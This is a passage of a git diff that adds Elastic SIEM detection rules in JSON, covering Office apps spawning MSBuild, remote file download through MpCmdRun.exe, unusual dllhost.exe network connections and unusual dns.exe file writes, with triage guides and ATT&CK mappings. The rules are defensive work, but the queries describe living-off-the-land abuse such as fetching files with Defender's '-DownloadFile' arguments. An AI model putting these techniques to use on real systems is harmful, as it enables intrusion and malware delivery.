creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"MSBuild.exe\" and\n process.parent.name : (\"eqnedt32.exe\",\n \"excel.exe\",\n \"fltldr.exe\",\n \"msaccess.exe\",\n \"mspub.exe\",\n \"outlook.exe\",\n \"powerpnt.exe\",\n \"winword.exe\" )\n", + "references": [ + "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c5dc3223-13a2-44a2-946c-e9dc0aa0449c", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1127/", + "subtechnique": [ + { + "id": "T1127.001", + "name": "MSBuild", + "reference": "https://attack.mitre.org/techniques/T1127/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "c5dc3223-13a2-44a2-946c-e9dc0aa0449c_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_111.json b/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_111.json new file mode 100644 index 00000000000..bf2d7c32b42 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_111.json @@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the Windows Defender configuration utility (MpCmdRun.exe) being used to download a remote file.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote File Download via MpCmdRun", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via MpCmdRun\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `MpCmdRun.exe` is a command-line tool part of Windows Defender and is used to manage various Microsoft Windows Defender Antivirus settings and perform certain tasks. It can also be abused by attackers to download remote files, including malware and offensive tooling. This rule looks for the patterns used to perform downloads using the utility.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses the [Investigate Markdown Plugin](https://www.elastic.co/guide/en/security/master/interactive-investigation-guides.html) introduced in Elastic Stack version 8.8.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - !{investigate{\"label\":\"Alerts associated with the user in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"user.id\",\"queryType\":\"phrase\",\"value\":\"{{user.id}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n - !{investigate{\"label\":\"Alerts associated with the host in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"host.name\",\"queryType\":\"phrase\",\"value\":\"{{host.name}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - !{investigate{\"label\":\"Investigate the Subject Process Network Events\",\"providers\":[[{\"excluded\":false,\"field\":\"process.entity_id\",\"queryType\":\"phrase\",\"value\":\"{{process.entity_id}}\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"event.category\",\"queryType\":\"phrase\",\"value\":\"network\",\"valueType\":\"string\"}]]}}\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"MpCmdRun.exe\" or ?process.pe.original_file_name == \"MpCmdRun.exe\") and\n process.args : \"-DownloadFile\" and process.args : \"-url\" and process.args : \"-path\"\n", + "references": [ + "https://twitter.com/mohammadaskar2/status/1301263551638761477", + "https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-can-ironically-be-used-to-download-malware/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c6453e73-90eb-4fe7-a98c-cde7bbfc504a", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "c6453e73-90eb-4fe7-a98c-cde7bbfc504a_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_112.json b/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_112.json new file mode 100644 index 00000000000..1f0a7c52be3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_112.json @@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the Windows Defender configuration utility (MpCmdRun.exe) being used to download a remote file.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote File Download via MpCmdRun", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via MpCmdRun\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `MpCmdRun.exe` is a command-line tool part of Windows Defender and is used to manage various Microsoft Windows Defender Antivirus settings and perform certain tasks. It can also be abused by attackers to download remote files, including malware and offensive tooling. This rule looks for the patterns used to perform downloads using the utility.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses the [Investigate Markdown Plugin](https://www.elastic.co/guide/en/security/master/interactive-investigation-guides.html) introduced in Elastic Stack version 8.8.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - !{investigate{\"label\":\"Alerts associated with the user in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"user.id\",\"queryType\":\"phrase\",\"value\":\"{{user.id}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n - !{investigate{\"label\":\"Alerts associated with the host in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"host.name\",\"queryType\":\"phrase\",\"value\":\"{{host.name}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - !{investigate{\"label\":\"Investigate the Subject Process Network Events\",\"providers\":[[{\"excluded\":false,\"field\":\"process.entity_id\",\"queryType\":\"phrase\",\"value\":\"{{process.entity_id}}\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"event.category\",\"queryType\":\"phrase\",\"value\":\"network\",\"valueType\":\"string\"}]]}}\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"MpCmdRun.exe\" or ?process.pe.original_file_name == \"MpCmdRun.exe\") and\n process.args : \"-DownloadFile\" and process.args : \"-url\" and process.args : \"-path\"\n", + "references": [ + "https://twitter.com/mohammadaskar2/status/1301263551638761477", + "https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-can-ironically-be-used-to-download-malware/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c6453e73-90eb-4fe7-a98c-cde7bbfc504a", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "c6453e73-90eb-4fe7-a98c-cde7bbfc504a_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c7894234-7814-44c2-92a9-f7d851ea246a_106.json b/packages/security_detection_engine/kibana/security_rule/c7894234-7814-44c2-92a9-f7d851ea246a_106.json new file mode 100644 index 00000000000..a78c6dcdae9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c7894234-7814-44c2-92a9-f7d851ea246a_106.json @@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies unusual instances of dllhost.exe making outbound network connections. This may indicate adversarial Command and Control activity.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Network Connection via DllHost", + "query": "sequence by host.id, process.entity_id with maxspan=1m\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"dllhost.exe\" and process.args_count == 1]\n [network where host.os.type == \"windows\" and process.name : \"dllhost.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\", \"192.0.2.0/24\",\n \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\",\n \"192.175.48.0/24\", \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\", \"FE80::/10\",\n \"FF00::/8\")]\n", + "references": [ + "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", + "https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/", + "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c7894234-7814-44c2-92a9-f7d851ea246a", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "c7894234-7814-44c2-92a9-f7d851ea246a_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_109.json b/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_109.json new file mode 100644 index 00000000000..fb51ead7675 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_109.json @@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an unexpected file being modified by dns.exe, the process responsible for Windows DNS Server services, which may indicate activity related to remote code execution or other forms of exploitation.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual File Modification by dns.exe", + "note": "## Triage and analysis\n\n### Investigating Unusual File Write\nDetection alerts from this rule indicate potential unusual/abnormal file writes from the DNS Server service process (`dns.exe`) after exploitation from CVE-2020-1350 (SigRed) has occurred. Here are some possible avenues of investigation:\n- Post-exploitation, adversaries may write additional files or payloads to the system as additional discovery/exploitation/persistence mechanisms.\n- Any suspicious or abnormal files written from `dns.exe` should be reviewed and investigated with care.\n", + "query": "file where host.os.type == \"windows\" and process.name : \"dns.exe\" and event.type in (\"creation\", \"deletion\", \"change\") and\n not file.name : \"dns.log\" and not\n (file.extension : (\"old\", \"temp\", \"bak\", \"dns\", \"arpa\") and file.path : \"C:\\\\Windows\\\\System32\\\\dns\\\\*\")\n", + "references": [ + "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/", + "https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/", + "https://www.elastic.co/security-labs/detection-rules-for-sigred-vulnerability" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_110.json b/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_110.json new file mode 100644 index 00000000000..8178372a602 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_110.json @@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an unexpected file being modified by dns.exe, the process responsible for Windows DNS Server services, which may indicate activity related to remote code execution or other forms of exploitation.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual File Modification by dns.exe", + "note": "## Triage and analysis\n\n### Investigating Unusual File Write\nDetection alerts from this rule indicate potential unusual/abnormal file writes from the DNS Server service process (`dns.exe`) after exploitation from CVE-2020-1350 (SigRed) has occurred. Here are some possible avenues of investigation:\n- Post-exploitation, adversaries may write additional files or payloads to the system as additional discovery/exploitation/persistence mechanisms.\n- Any suspicious or abnormal files written from `dns.exe` should be reviewed and investigated with care.\n", + "query": "file where host.os.type == \"windows\" and process.name : \"dns.exe\" and event.type in (\"creation\", \"deletion\", \"change\") and\n not file.name : \"dns.log\" and not\n (file.extension : (\"old\", \"temp\", \"bak\", \"dns\", \"arpa\") and file.path : \"C:\\\\Windows\\\\System32\\\\dns\\\\*\")\n", + "references": [ + "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/", + "https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/", + "https://www.elastic.co/security-labs/detection-rules-for-sigred-vulnerability" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Data Source: 